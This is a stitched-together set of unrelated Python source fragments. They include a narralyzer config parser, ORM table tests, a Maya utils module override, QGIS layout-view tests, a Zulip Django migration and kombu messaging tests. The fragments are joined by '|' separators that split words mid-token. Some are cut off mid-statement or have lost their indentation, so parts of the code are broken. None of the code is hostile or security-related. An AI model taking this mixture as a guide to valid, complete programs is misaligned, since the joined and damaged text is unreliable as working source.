# Python 2 hack: force utf-8 as the default codec for implicit str<->unicode
# conversions (setdefaultencoding is removed by site.py, hence the reload).
reload(sys)
sys.setdefaultencoding('utf-8')
# Prefer the package logger; fall back to a local 'utils' module, then to
# None (all logging calls below are guarded against a missing logger).
try:
    from narralyzer.util import logger as logger
except:
    try:
        from utils import logger
    except:
        logger = None
class Config():
    """
    Configuration module.

    Reads conf/config.ini (relative to the package root) once and exposes
    the values through :meth:`get`.

    >>> config = Config()
    >>> config.get('supported_languages')
    'de en nl sp'
    >>> config.get('SUPPORTED_LANGUAGES')
    'DE EN NL SP'
    >>> config.get('version')
    '0.1'
    >>> config.get('lang_en_stanford_port')
    '9991'
    """
    # NOTE(review): this dict is a class attribute, so its parsed state is
    # shared by all Config instances (the file is only parsed once per
    # process) -- confirm that is intentional before instantiating twice.
    config = {
        'config_file': 'conf/config.ini',
        'models': None,
        'root': None,
        'self': path.abspath(__file__),
        'supported_languages': [],
        'version': '0.1',
    }
    logger = None

    def __init__(self):
        """Locate the package root, set up logging and parse the config."""
        # Try to find out where the root of this package is.
        if self.config.get('root', None) is None:
            root = path.join(
                path.dirname(
                    path.abspath(__file__)))
            root = path.join(root, '..')
            self.config['root'] = path.abspath(root)
        root = self.config['root']
        # Initialize the logger with the name of this class.
        if self.logger is None and not logger is None:
            self.logger = logger(self.__class__.__name__, 'info')
            self.logger.debug("Assuming root: {0}".format(root))
        # Set the path to the config-file (config.ini).
        config_file = path.join(root, self.config.get('config_file'))
        self.config['config_file'] = config_file
        # Read and parse the config file,
        # skip if this has been done before.
        if self.config.get('models', None) is None:
            self._parse_config(config_file)
        # Config file was parsable,

    def _parse_config(self, config_file):
        """Parse *config_file* into self.config.

        Sections named 'lang_<code>' become entries in config['models'];
        keys from the [main] section land on the top-level config dict.
        Exits the process (-1) when the file does not exist.
        """
        # Check if the config file at least exists.
        if not path.isfile(config_file):
            msg = ("Could not open config file: {0}".format(
                path.abspath(config_file)))
            if not self.logger is None:
                self.logger.critical(msg)
            sys.exit(-1)
        # Use https://docs.python.org/3.5/library/configparser.html
        # to open and parse the config.
        config = ConfigParser()
        try:
            config.read(config_file)
            if not self.logger is None:
                self.logger.debug("Using config file: {0}".format(
                    config_file))
        except:
            # NOTE(review): a parse failure is only logged; execution then
            # continues with an empty parser -- confirm this is intended.
            if not self.logger is None:
                self.logger.critical("Failed to open: {0}".format(
                    config_file))
        # Use the values in the config-file to populate
        # the config dictionary.
        self.config['models'] = {}
        for section in config.sections():
            if section.startswith('lang_'):
                # One model dict per language section.
                language_3166 = section.replace('lang_', '')
                self.config['models'][language_3166] = {
                    'language_3166': language_3166
                }
                for val in config.items(section):
                    if val[0] not in self.config['models'][language_3166]:
                        self.config['models'][language_3166][val[0]] = val[1]
            if section == 'main':
                for key in config.items(section):
                    self.config[key[0]] = key[1]
        # Every parsed language model counts as a supported language.
        for language in self.config.get('models'):
            if language not in self.config["supported_languages"]:
                self.config["supported_languages"].append(language)

    def get(self, variable):
        """Return the config value for *variable*, or None when unknown.

        An all-uppercase *variable* returns the value uppercased as well.
        Keys like 'lang_<code>_<field>' are resolved against the per-language
        model dicts; '*_stanford_path' resolves to a file in the Stanford
        NER directory for that language; '*.txt' values are read from disk.
        """
        # If enduser wants caps.
        end_users_wants_uppercase = False
        if variable.isupper():
            variable = variable.lower()
            # Give him or her caps!
            end_users_wants_uppercase = True
        result = self.config.get(variable, None)
        if variable.startswith('lang_'):
            # Special case for the language modes.
            result = self.config.get('models', None)
        # If the requested config variable was not found, exit.
        if not isinstance(result, (str, dict, list)):
            return None
        # Parse the 'models', into lang_en_stanford_port: 9991 fashion.
        if isinstance(result, dict):
            if variable.endswith('stanford_path'):
                requested_language = variable.replace('_stanford_path', '')
                requested_language = requested_language.replace('lang_', '')
                for language_3166 in result:
                    if language_3166 == requested_language:
                        # NOTE(review): assumes exactly one model file per
                        # language directory; listdir order is not
                        # deterministic -- confirm.
                        ner_path = self.config.get('stanford_ner_path')
                        ner_path = path.join(
                            self.config.get('root'),
                            ner_path,
                            language_3166)
                        result = listdir(ner_path)[0]
                        result = path.join(ner_path, result)
            else:
                for language_3166 in result:
                    if not isinstance(result, dict):
                        continue
                    for key in result.get(language_3166):
                        key_name = "lang_{0}_{1}".format(language_3166, key)
                        if key_name == variable:
                            result = result.get(language_3166).get(key)
                            break
                if not isinstance(result, str):
                    return None
        # Lists will be displayed with spaces in between
        if isinstance(result, list):
            result = " ".join(sorted(result))
        # If the requested variable is one of the .txt files,
        # read the file from disk, and return it.
        if isinstance(result, str):
            if result.endswith(".txt"):
                with open(path.join(self.config.get('root'), result)) as fh:
                    result = ", ".join(
                        [i.strip() for i in (
                            fh.read().split('\n')[:4])])[:-1]
        # Make a wish come true
        if end_users_wants_uppercase:
            return result.upper()
        return result

    def __repr__(self):
        """Render every resolvable config parameter, one per line."""
        current_config = ""
        for item in sorted(self.config):
            if not self.get(item) is None:
                current_config += "\n\t{0}: {1}".format(item, self.get(item))
        result = "Available config parameters:\n\t{0}".format(
            current_config.strip())
        return result
if __name__ == "__main__":
    # CLI: "python config.py <key>" prints the value for <key>;
    # any invocation containing "test" runs the doctests;
    # no arguments dumps the whole config via __repr__.
    config = Config()
    if len(sys.argv) >= 2 and "test" not in " ".join(sys.argv):
        result = config.get(" ".join(sys.argv[1:]))
        if result is None:
            msg = "Config key {0} unknown.".format(" ".join(sys.argv[1:]))
            if not logger is None:
                config.logger.fatal(msg)
            else:
                print(msg)
            exit(-1)
        else:
            print(result)
    else:
        if len(sys.argv) >= 2 and "test" in " ".join(sys.argv):
            import doctest
            doctest.testmod(verbose=True)
        else:
            print(config)
|
# Shorten the import for this because i | t will be used in configs
from libqtile.backend.wayland.inpu | ts import InputConfig # noqa: F401
|
ledefs import Foo, Bar
class TableTest(unittest.TestCase):
    def test_init_2_AutoIdCols(self):
        """A Table may declare at most one AutoIdCol."""
        # Table can have only 1 AutoIdCol
        try:
            Table("xyz", AutoIdCol("id1"), IntCol("x"), AutoIdCol("id2"))
        except AssertionError, e:
            self.assertEquals("Table 'xyz' has more than one AutoIdCol", str(e))
        else:
            self.fail()
    def test_init_duplicate_col_name(self):
        """Duplicate column names are rejected at construction time."""
        try:
            Table("xyz", AutoIdCol("id1"), IntCol("x"), UnicodeCol("x", 20))
        except AssertionError, e:
            self.assertEquals("Table 'xyz' has more than one column with name 'x'", str(e))
        else:
            self.fail()
    def test_cols(self):
        """Table.cols preserves the declaration order of the columns."""
        expected = ["foo_id", "i1", "s1", "d1"]
        actual = [col.col_name for col in Foo.cols]
        self.assertEquals(expected, actual)
        expected = ["bi", "bs", "bd", "bdt1", "bb"]
        actual = [col.col_name for col in Bar.cols]
        self.assertEquals(expected, actual)
    def test_auto_id_col(self):
        """auto_id_col points at the AutoIdCol, or is None when absent."""
        # AutoIdCol field identified by __init__
        self.assert_(Foo.auto_id_col is Foo.cols[0])
        self.assert_(Bar.auto_id_col is None)
    def test_new_parse_defaults(self):
        """new() and parse() with no arguments yield per-column defaults."""
        expected = {
            "foo_id": None,
            "i1": 0,
            "s1": "",
            "d1": None,
        }
        actual = Foo.new()
        self.assertEquals(expected, actual)
        actual = Foo.parse()
        self.assertEquals(expected, actual)
        expected = {
            "bi": None,
            "bs": "",
            "bd": None,
            "bdt1": None,
            "bb": False,
        }
        actual = Bar.new()
        self.assertEquals(expected, actual)
        actual = Bar.parse()
        self.assertEquals(expected, actual)
    def test_parse_auto_id(self):
        """parse() accepts an explicit None for the AutoIdCol."""
        expected = {
            "foo_id": None,
            "i1": 0,
            "s1": "",
            "d1": None,
        }
        actual = Foo.parse(foo_id=None)
        self.assertEquals(expected, actual)
    def test_new_parse_all(self):
        """new() takes typed values; parse() also converts from strings."""
        expected = {
            "foo_id": 42,
            "i1": 101,
            "s1": "alpha",
            "d1": date(2006,6,6),
        }
        actual = Foo.new(foo_id=42, i1=101, s1="alpha", d1=date(2006,6,6))
        self.assertEquals(expected, actual)
        actual = Foo.parse(foo_id="42", i1="101", s1="alpha", d1="2006-06-06")
        self.assertEquals(expected, actual)
        # parse some fields str
        actual = Foo.parse(foo_id="42", i1=101, s1="alpha", d1=date(2006,6,6))
        self.assertEquals(expected, actual)
    def test_new_parse_some_fields(self):
        """Omitted fields fall back to their column defaults."""
        expected = {
            "foo_id": 42,
            "i1": 0,
            "s1": "alpha",
            "d1": None,
        }
        actual = Foo.new(foo_id=42, s1="alpha")
        self.assertEquals(expected, actual)
        actual = Foo.parse(foo_id="42", s1="alpha")
        self.assertEquals(expected, actual)
    def test_new_parse_clone(self):
        """new() and parse() return a fresh dict, never the input mapping."""
        # new() and parse() should return a new dictionary
        expected = {
            "foo_id": 42,
            "i1": 0,
            "s1": "alpha",
            "d1": None,
        }
        actual = Foo.new(**expected)
        self.assertEquals(expected, actual)
        self.assertFalse(actual is expected)
        actual = Foo.parse(**expected)
        self.assertEquals(expected, actual)
        self.assertFalse(actual is expected)
    def test_new_parse_unkown_cols(self):
        """Keyword args that are not declared columns are silently dropped."""
        # DONT copy unknown columns
        expected = {
            "foo_id": None,
            "i1": 16,
            "s1": "",
            "d1": None,
        }
        actual = Foo.new(i1=16, s2="beta")
        self.assertEquals(expected, actual)
        actual = Foo.parse(i1="16", s2="beta")
        self.assertEquals(expected, actual)
    def test_parse_empty_string(self):
        """parse() treats '' for any column as 'use the default value'."""
        # parse() replaces empty strings with default value
        expected = {
            "foo_id": None,
            "i1": 0,
            "s1": "",
            "d1": None,
        }
        actual = Foo.parse(foo_id="", i1="", s1="", d1="")
        self.assertEquals(expected, actual)
        expected = {
            "bi": None,
            "bs": "",
            "bd": None,
            "bdt1": None,
            "bb": False,
        }
        actual = Bar.parse(bi="", bs="", bd="", bdt1="", bb="")
        self.assertEquals(expected, actual)
    def test_new_bad_values(self):
        """new() raises TypeError for values of the wrong type."""
        # new() does not allow bad values
        try:
            Foo.new(i1="bar", s2=1.1)
        except TypeError, e:
            self.assertEquals("IntCol 'i1': int expected, got str", str(e))
        else:
            self.fail()
    def test_parse_bad_values(self):
        """parse() rejects non-string values of the wrong type."""
        # parse() does not allow non-string bad values
        try:
            Foo.parse(i1=2.3, s2=1.1)
        except TypeError, e:
            self.assertEquals("IntCol 'i1': int expected, got float", str(e))
        else:
            self.fail()
    def test_parse_error(self):
        """parse() surfaces ValueError for unconvertible strings."""
        # parse() gives parse error for bad strings
        try:
            Foo.parse(i1="2.3", s2=1.1)
        except ValueError, e:
            # Both message variants cover different Python point releases.
            self.assert_(
                str(e) in [
                    "invalid literal for int(): 2.3",
                    "invalid literal for int() with base 10: '2.3'",
                ]
            )
        else:
            self.fail()
def test_check_values(self):
# defaults / None
foo = Foo.new()
auto_id = Foo.check_values(foo)
self.assert_(auto_id)
# given values / no None
foo = {
"foo_id": 42,
"i1": 101,
"s1": "alpha",
"d1": date(2006,6,6),
}
auto_id = Foo.check_values(foo)
self.assertFalse(auto_id)
# bad value
foo = Foo.new()
foo["i1"] = "bar"
try:
Foo.check_values(foo)
except TypeError, e:
self.assertEquals("IntCol 'i1': int expected, got str", str(e))
else:
self.fail()
# bad value
foo = Foo.new()
foo["s1"] = 1.1
try:
Foo.check_values(foo)
except TypeError, e:
self.assertEquals("UnicodeCol 's1': unicode expected, got float", str(e))
else:
self.fail()
# unknown columns ignored
foo = Foo.new(s2=None)
foo["s3"] = 1.2
auto_id = Foo.check_values(foo)
self.assert_(True, auto_id)
    def test_q(self):
        """Table.q exposes declared columns and rejects unknown names."""
        q = Foo.q
        # existing columns
        q_foo_id = Foo.q.foo_id
        q_i1 = Foo.q.i1
        # non-existing column
        try:
            Foo.q.i2
        except AttributeError, e:
            self.assertEquals("QueryCols instance has no attribute 'i2'", str(e))
        else:
            self.fail()
    def test_q_ops(self):
        """Comparison operators on query columns build SqlCondition objects."""
        qexpr = Foo.q.foo_id == 1
        self.assert_(isinstance(qexpr, SqlCondition))
        qexpr = Foo.q.d1 == None
        self.assert_(isinstance(qexpr, SqlCondition))
        qexpr = Foo.q.d1 > date(2007, 5, 22)
        self.assert_(isinstance(qexpr, SqlCondition))
        qexpr = Foo.q.d1 >= date(2007, 5, 22)
        self.assert_(isinstance(qexpr, SqlCondition))
        qexpr = Foo.q.d1 < date(2007, 5, 22)
        self.assert_(isinstance(qexpr, SqlCondition))
        qexpr = Foo.q.d1 <= date(2007, 5, 22)
        self.assert_(isinstance(qexpr, SqlCondition))
    def test_q_ops_assign(self):
        """Assigning to a query column is an error, not a condition."""
        try:
            Foo.q.foo_id = "xyz"
        except AttributeError:
            pass
        else:
            self.fail()
    def test_q_ops_check_value(self):
        """Query-column comparisons type-check their right-hand operand."""
        try:
            Foo.q.foo_id == "xyz"
        except TypeError, e:
            self.assertEquals("AutoIdCol 'foo_id': int expected, got str", str(e))
        else:
            self.fail()
        try:
            Foo.q.s1 > 23
        except TypeError, e:
            self.assertEquals("UnicodeCol 's1': unicode expected, got int", str(e))
        else:
            self.fail()
def test_q_ops_auto_id(self):
try:
Foo.q.foo_id == None
except AssertionError, e:
self. |
s.runOverriddenModule(__name__, lambda: None, globals())
Note that if modName is a sub-module, ie "myPackage.myModule", then calling
this function will cause "myPackage" to be imported, in order to determine
myPackage.__path__ (though in most circumstances, it will already have
been).
Parameters
----------
modName : str
The name of the overriden module that you wish to execute
callingFileFunc : function
A function that is defined in the file that calls this function; this is
provided solely as a means to identify the FILE that calls this
function, through the use of inspect.getsourcefile(callingFileFunc).
This is necessary because it is possible for this call to get "chained";
ie, if you have path1/myMod.py, path2/myMod.py, and path3/myMod.py,
which will be found on the sys.path in that order when you import myMod,
and BOTH path1/myMod.py AND path2/myMod.py use runOverriddenModule, then
the desired functionality would be: path1/myMod.py causes
path2/myMod.py, which causes path3/myMod.py to run. However, if
runOverriddenModule only had __name__ (or __file__) to work off of,
path2/myMod.py would still "think" it was executing in the context of
path1/myMod.py... resulting in an infinite loop when path2/myMod.py
calls runOverriddenModule. This parameter allows runOverriddenModule to
find the "next module down" on the system path. If the file that
originated this function is NOT found on the system path, an ImportError
is raised.
globals : dict
the globals that the overridden module should be executed with
Returns
-------
str
The filepath that was executed
'''
import inspect
import os.path
import sys
import imp
try:
from os.path import samefile
except ImportError:
# os.samefile does not exist on Windows (as of Python version < 3k)
# WARNING: Resorting to a less than ideal method to checking for same file
# TODO: Add deeper implementation of the samefile hack for windows
# in future, if possible.
def samefile(p1, p2):
return os.stat(p1) == os.stat(p2)
callingFile = inspect.getsourcefile(callingFileFunc)
# because the same path might be in the sys.path twice, resulting
# in THIS EXACT FILE showing up in the search path multiple times, we
# need to continue until we know the next found path is not this one - or
# any other path already found by runOverriddenModule.
# ie, suppose we have TWO modules which both use runOverriddenModule, A
# and B, and one "base" module they override, C. Then suppose our sys.path
# would cause them to be discovered in this order: [A, B, B, A, C].
# We need to make sure that we get to C even in this scenario! To do this,
# we store already-executed paths in the globals...
executedFiles = globals.get('_runOverriddenModule_already_executed')
if executedFiles is None:
executedFiles = set()
globals['_runOverriddenModule_already_executed'] = executedFiles
executedFiles.add(callingFile)
# first, determine the path to search for the module...
packageSplit = modName.rsplit('.', 1)
if len(packageSplit) == 1:
# no parent package: use sys.path
path = sys.path
baseModName = modName
else:
# import the parent package (if any), in order to find it's __path__
packageName, baseModName = packageSplit
packageMod = __import__(packageName, fromlist=[''], level=0)
path = packageMod.__path__
# now, find which path would result in the callingFile... safest way to do
# this is with imp.find_module... but we need to know WHICH path caused
# the module to be found, so we go one-at-a-time...
for i, dir in enumerate(path):
dir = path[i]
try:
findResults = imp.find_module(baseModName, [dir])
except ImportError:
continue
# close the open file handle..
if isinstance(findResults[0], file):
findResults[0].close()
# ...then check if the found file matched the callingFile
if any(samefile(findResults[1], oldFile)
for oldFile in executedFiles):
continue
else:
break
else:
# we couldn't find the file - raise an ImportError
raise ImportError("Couldn't find a version of the file %r that hadn't "
"already been executed when using path %r"
% (callingFile, path))
execfile(findResults[1], globals)
return findResults[1]
# first, run the "real" maya.utils...
runOverriddenModule(__name__, lambda: None, globals())
# ...then monkey patch it!
# first, allow setting of the stream for the shellLogHandler based on an env.
# variable...
_origShellLogHandler = shellLogHandler
def shellLogHandler(*args, **kwargs):
    """Delegate to the original shellLogHandler, optionally swapping streams.

    If the MAYA_SHELL_LOGGER_STREAM environment variable names an attribute
    of ``sys`` (e.g. 'stderr'), the returned handler writes to that stream.
    """
    handler = _origShellLogHandler(*args, **kwargs)
    streamName = os.environ.get('MAYA_SHELL_LOGGER_STREAM')
    if streamName is not None:
        replacement = getattr(sys, streamName, None)
        if replacement is not None:
            handler.stream = replacement
    return handler
# ...then, override the formatGuiException method to better deal with IOError /
# OSError formatting
def formatGuiException(exceptionType, exceptionObject, traceBack, detail=2):
"""
Format a trace stack into a string.
exceptionType : Type of exception
exceptionObject : Detailed exception information
traceBack : Exception traceback stack information
detail : 0 = no trace info, 1 = line/file only, 2 = full trace
To perform an action when an exception occurs without modifying Maya's
default printing of exceptions, do the following::
import maya.utils
def myExceptCB(etype, value, tb, detail=2):
# do something here...
return maya.utils._formatGuiException(etype, value, tb, detail)
maya.utils.formatGuiException = myExceptCB
"""
# originally, this code used
# exceptionMsg = unicode(exceptionObject.args[0])
# Unfortunately, | the problem with this is that the first arg is NOT always
# the string message - ie, witness
# IOError(2, 'No such fi | le or directory', 'non_existant.file')
# So, instead, we always just use:
# exceptionMsg = unicode(exceptionObject).strip()
# Unfortunately, for python 2.6 and before, this has some issues:
# >>> str(IOError(2, 'foo', 'bar'))
# "[Errno 2] foo: 'bar'"
# >>> unicode(IOError(2, 'foo', 'bar'))
# u"(2, 'foo')"
# However, 2014+ uses 2.7, and even for 2013, "(2, 'foo')" is still better
# than just "2"...
if issubclass(exceptionType, SyntaxError):
# syntax errors are unique, in that str(syntaxError) will include line
# number info, which is what detail == 0 is trying to avoid...
exceptionMsg = unicode(exceptionObject.args[0])
else:
exceptionMsg = unicode(exceptionObject).strip()
if detail == 0:
result = exceptionType.__name__ + ': ' + exceptionMsg
else:
# extract a process stack from the tracekback object
tbStack = traceback.extract_tb(traceBack)
tbStack = _fixConsoleLineNumbers(tbStack)
if detail == 1:
# format like MEL error with line number
if tbStack:
file, line, func, text = tbStack[-1]
result = u'%s: file %s line %s: %s' % (exceptionType.__name__, file, line, exceptionMsg)
else:
result = exceptionMsg
else: # detail == 2
# format the exception
excLines = _decodeStack(traceback.format_exception_only(exceptionType, exceptionObject))
# traceback may have failed to decode a unicode exception value
# if so, we will swap the unicode back in
if len(excLines) > 0:
excLines[-1] = re.sub(r'< |
view.scaleSafe(4)
self.assertAlmostEqual(view.transform().m11(), 8)
# try to zoom in heaps
view.scaleSafe(99999999)
# assume we have hit the limit
scale = view.transform().m11()
view.scaleSafe(2)
self.assertAlmostEqual(view.transform().m11(), scale)
view.setTransform(QTransform.fromScale(1, 1))
self.assertAlmostEqual(view.transform().m11(), 1)
# test zooming out
view.scaleSafe(0.5)
self.assertAlmostEqual(view.transform().m11(), 0.5)
view.scaleSafe(0.1)
self.assertAlmostEqual(view.transform().m11(), 0.05)
# try zooming out heaps
view.scaleSafe(0.000000001)
# assume we have hit the limit
scale = view.transform().m11()
view.scaleSafe(0.5)
self.assertAlmostEqual(view.transform().m11(), scale)
    def testLayoutScalePixels(self):
        """Zoom level maps 1:1 onto the view scale when units are pixels."""
        p = QgsProject()
        l = QgsLayout(p)
        l.setUnits(QgsUnitTypes.LayoutPixels)
        view = QgsLayoutView()
        view.setCurrentLayout(l)
        view.setZoomLevel(1)
        # should be no transform, since 100% with pixel units should be pixel-pixel
        self.assertEqual(view.transform().m11(), 1)
        view.setZoomLevel(0.5)
        self.assertEqual(view.transform().m11(), 0.5)
    def testSelectAll(self):
        """selectAll selects every unlocked item and emits itemFocused once."""
        p = QgsProject()
        l = QgsLayout(p)
        # add some items
        item1 = QgsLayoutItemPicture(l)
        l.addItem(item1)
        item2 = QgsLayoutItemPicture(l)
        l.addItem(item2)
        item3 = QgsLayoutItemPicture(l)
        item3.setLocked(True)
        l.addItem(item3)

        view = QgsLayoutView()
        # no layout, no crash
        view.selectAll()
        view.setCurrentLayout(l)

        focused_item_spy = QSignalSpy(view.itemFocused)
        view.selectAll()
        self.assertTrue(item1.isSelected())
        self.assertTrue(item2.isSelected())
        self.assertFalse(item3.isSelected())  # locked
        self.assertEqual(len(focused_item_spy), 1)

        item3.setSelected(True)  # locked item selection should be cleared
        view.selectAll()
        self.assertTrue(item1.isSelected())
        self.assertTrue(item2.isSelected())
        self.assertFalse(item3.isSelected())  # locked
    def testDeselectAll(self):
        """deselectAll clears selection on all items, locked ones included."""
        p = QgsProject()
        l = QgsLayout(p)
        # add some items
        item1 = QgsLayoutItemPicture(l)
        l.addItem(item1)
        item2 = QgsLayoutItemPicture(l)
        l.addItem(item2)
        item3 = QgsLayoutItemPicture(l)
        item3.setLocked(True)
        l.addItem(item3)

        view = QgsLayoutView()
        # no layout, no crash
        view.deselectAll()
        view.setCurrentLayout(l)

        focused_item_spy = QSignalSpy(view.itemFocused)
        view.deselectAll()
        self.assertFalse(item1.isSelected())
        self.assertFalse(item2.isSelected())
        self.assertFalse(item3.isSelected())
        self.assertEqual(len(focused_item_spy), 1)

        item1.setSelected(True)
        item2.setSelected(True)
        item3.setSelected(True)
        view.deselectAll()
        self.assertFalse(item1.isSelected())
        self.assertFalse(item2.isSelected())
        self.assertFalse(item3.isSelected())
    def testInvertSelection(self):
        """invertSelection flips unlocked items; locked items never select."""
        p = QgsProject()
        l = QgsLayout(p)
        # add some items
        item1 = QgsLayoutItemPicture(l)
        l.addItem(item1)
        item2 = QgsLayoutItemPicture(l)
        l.addItem(item2)
        item3 = QgsLayoutItemPicture(l)
        item3.setLocked(True)
        l.addItem(item3)

        view = QgsLayoutView()
        # no layout, no crash
        view.invertSelection()
        view.setCurrentLayout(l)

        focused_item_spy = QSignalSpy(view.itemFocused)
        view.invertSelection()
        self.assertTrue(item1.isSelected())
        self.assertTrue(item2.isSelected())
        self.assertFalse(item3.isSelected())  # locked
        self.assertEqual(len(focused_item_spy), 1)

        item3.setSelected(True)  # locked item selection should be cleared
        view.invertSelection()
        self.assertFalse(item1.isSelected())
        self.assertFalse(item2.isSelected())
        self.assertFalse(item3.isSelected())  # locked
    def testSelectNextByZOrder(self):
        """Above/below selection walks the z-order and clamps at the ends.

        Each effective selection change emits itemFocused exactly once;
        clamped calls (already top/bottom) must not emit.
        """
        p = QgsProject()
        l = QgsLayout(p)
        # add some items
        item1 = QgsLayoutItemPicture(l)
        l.addItem(item1)
        item2 = QgsLayoutItemPicture(l)
        l.addItem(item2)
        item3 = QgsLayoutItemPicture(l)
        item3.setLocked(True)
        l.addItem(item3)

        view = QgsLayoutView()
        # no layout, no crash
        view.selectNextItemAbove()
        view.selectNextItemBelow()
        view.setCurrentLayout(l)

        focused_item_spy = QSignalSpy(view.itemFocused)
        # no selection
        view.selectNextItemAbove()
        view.selectNextItemBelow()
        self.assertEqual(len(focused_item_spy), 0)

        l.setSelectedItem(item1)
        self.assertEqual(len(focused_item_spy), 1)
        # already bottom most
        view.selectNextItemBelow()
        self.assertTrue(item1.isSelected())
        self.assertFalse(item2.isSelected())
        self.assertFalse(item3.isSelected())
        self.assertEqual(len(focused_item_spy), 1)

        view.selectNextItemAbove()
        self.assertFalse(item1.isSelected())
        self.assertTrue(item2.isSelected())
        self.assertFalse(item3.isSelected())
        self.assertEqual(len(focused_item_spy), 2)

        view.selectNextItemAbove()
        self.assertFalse(item1.isSelected())
        self.assertFalse(item2.isSelected())
        self.assertTrue(item3.isSelected())
        self.assertEqual(len(focused_item_spy), 3)

        view.selectNextItemAbove()  # already top most
        self.assertFalse(item1.isSelected())
        self.assertFalse(item2.isSelected())
        self.assertTrue(item3.isSelected())
        self.assertEqual(len(focused_item_spy), 3)

        view.selectNextItemBelow()
        self.assertFalse(item1.isSelected())
        self.assertTrue(item2.isSelected())
        self.assertFalse(item3.isSelected())
        self.assertEqual(len(focused_item_spy), 4)

        view.selectNextItemBelow()
        self.assertTrue(item1.isSelected())
        self.assertFalse(item2.isSelected())
        self.assertFalse(item3.isSelected())
        self.assertEqual(len(focused_item_spy), 5)

        view.selectNextItemBelow()  # back to bottom most
        self.assertTrue(item1.isSelected())
        self.assertFalse(item2.isSelected())
        self.assertFalse(item3.isSelected())
        self.assertEqual(len(focused_item_spy), 5)
    def testLockActions(self):
        """unlockAllItems selects the items it unlocks; lockSelectedItems
        locks them and clears the selection."""
        p = QgsProject()
        l = QgsLayout(p)

        view = QgsLayoutView()
        view.setCurrentLayout(l)

        # add some items
        item1 = QgsLayoutItemPicture(l)
        l.addItem(item1)
        item2 = QgsLayoutItemPicture(l)
        l.addItem(item2)
        item3 = QgsLayoutItemPicture(l)
        l.addItem(item3)

        item1.setLocked(True)
        item3.setLocked(True)
        self.assertTrue(item1.isLocked())
        self.assertFalse(item2.isLocked())
        self.assertTrue(item3.isLocked())

        view.unlockAllItems()
        self.assertFalse(item1.isLocked())
        self.assertFalse(item2.isLocked())
        self.assertFalse(item3.isLocked())
        # previously locked items become the selection
        self.assertTrue(item1.isSelected())
        self.assertFalse(item2.isSelected())
        self.assertTrue(item3.isSelected())

        view.lockSelectedItems()
        self.assertTrue(item1.isLocked())
        self.assertFalse(item2.isLocked())
        self.assertTrue(item3.isLocked())
        self.assertFalse(item1.isSelected())
        self.assertFalse(item2.isSelected())
        self.assertFalse(item3.isSelected())
def testStacking(self):
p = QgsProject()
l = QgsLayout(p)
# add some items
item1 = QgsLayoutItemPicture(l)
l.addLayoutItem(item1)
item2 = QgsLayoutItemPicture(l)
l.addLayoutItem(item2)
item3 = QgsLayoutItemPicture(l)
l.addLayoutItem(item3)
view = QgsLayoutView()
|
from django.db import migrations
class Migration(migrations.Migration):
    """Add a case-insensitive per-realm uniqueness constraint on stream names."""

    dependencies = [
        ("zerver", "0301_fix_unread_messages_in_deactivated_streams"),
    ]

    operations = [
        # We do Stream lookups case-insensitively with respect to the name, but we were missing
        # the appropriate (realm_id, upper(name::text)) unique index to enforce uniqueness
        # on database level.
        migrations.RunSQL(
            """
            CREATE UNIQUE INDEX zerver_stream_realm_id_name_uniq ON zerver_stream (realm_id, upper(name::text));
            """
        ),
        # The expression index above supersedes the plain (realm, name)
        # unique_together constraint.
        migrations.AlterUniqueTogether(
            name="stream",
            unique_together=set(),
        ),
    ]
|
1 = compat.entry_to_queue("foo", **dict(defs))
self.assertEqual(q1.name, "foo")
self.assertEqual(q1.routing_key, "foo.#")
self.assertEqual(q1.exchange.name, "fooex")
self.assertEqual(q1.exchange.type, "topic")
self.assertTrue(q1.durable)
self.assertTrue(q1.exchange.durable)
self.assertFalse(q1.auto_delete)
self.assertFalse(q1.exchange.auto_delete)
q2 = compat.entry_to_queue("foo", **dict(defs,
exchange_durable=False))
self.assertTrue(q2.durable)
self.assertFalse(q2.exchange.durable)
q3 = compat.entry_to_queue("foo", **dict(defs,
exchange_auto_delete=True))
self.assertFalse(q3.auto_delete)
self.assertTrue(q3.exchange.auto_delete)
q4 = compat.entry_to_queue("foo", **dict(defs,
queue_durable=False))
self.assertFalse(q4.durable)
self.assertTrue(q4.exchange.durable)
q5 = compat.entry_to_queue("foo", **dict(defs,
queue_auto_delete=True))
self.assertTrue(q5.auto_delete)
self.assertFalse(q5.exchange.auto_delete)
self.assertEqual(compat.entry_to_queue("foo", **dict(defs)),
compat.entry_to_queue("foo", **dict(defs)))
class test_Publisher(unittest.TestCase):
    """Tests for the kombu compat Publisher wrapper."""

    def setUp(self):
        self.connection = BrokerConnection(transport=Transport)

    def test_constructor(self):
        # Defaults: durable, non-auto-delete direct exchange.
        publisher = compat.Publisher(self.connection,
                                     exchange="test_Publisher_constructor",
                                     routing_key="rkey")
        self.assertIsInstance(publisher.backend, Channel)
        self.assertEqual(publisher.exchange.name, "test_Publisher_constructor")
        self.assertTrue(publisher.exchange.durable)
        self.assertFalse(publisher.exchange.auto_delete)
        self.assertEqual(publisher.exchange.type, "direct")

        # Constructor flags are forwarded to the exchange.
        publisher2 = compat.Publisher(self.connection,
                                      exchange="test_Publisher_constructor2",
                                      routing_key="rkey",
                                      auto_delete=True,
                                      durable=False)
        self.assertTrue(publisher2.exchange.auto_delete)
        self.assertFalse(publisher2.exchange.durable)

        # An explicit Exchange instance is used as-is.
        explicit = Exchange("test_Publisher_constructor_explicit",
                            type="topic")
        publisher3 = compat.Publisher(self.connection,
                                      exchange=explicit)
        self.assertEqual(publisher3.exchange, explicit)

    def test_send(self):
        publisher = compat.Publisher(self.connection,
                                     exchange="test_Publisher_send",
                                     routing_key="rkey")
        publisher.send({"foo": "bar"})
        self.assertIn("basic_publish", publisher.backend)
        publisher.close()
        self.assertIn("close", publisher.backend)

    def test__enter__exit__(self):
        publisher = compat.Publisher(self.connection,
                                     exchange="test_Publisher_send",
                                     routing_key="rkey")
        entered = publisher.__enter__()
        self.assertIs(entered, publisher)
        entered.__exit__()
        self.assertIn("close", publisher.backend)
        self.assertTrue(publisher._closed)
class test_Consumer(unittest.TestCase):
    """Tests for the kombu compat Consumer wrapper."""

    def setUp(self):
        self.connection = BrokerConnection(transport=Transport)

    def test_constructor(self, n="test_Consumer_constructor"):
        # Defaults: durable queue and exchange, no auto_delete.
        c = compat.Consumer(self.connection, queue=n, exchange=n,
                            routing_key="rkey")
        self.assertIsInstance(c.backend, Channel)
        q = c.queues[0]
        self.assertTrue(q.durable)
        self.assertTrue(q.exchange.durable)
        self.assertFalse(q.auto_delete)
        self.assertFalse(q.exchange.auto_delete)
        self.assertEqual(q.name, n)
        self.assertEqual(q.exchange.name, n)
        # Constructor flags propagate to both queue and exchange.
        c2 = compat.Consumer(self.connection, queue=n + "2",
                             exchange=n + "2",
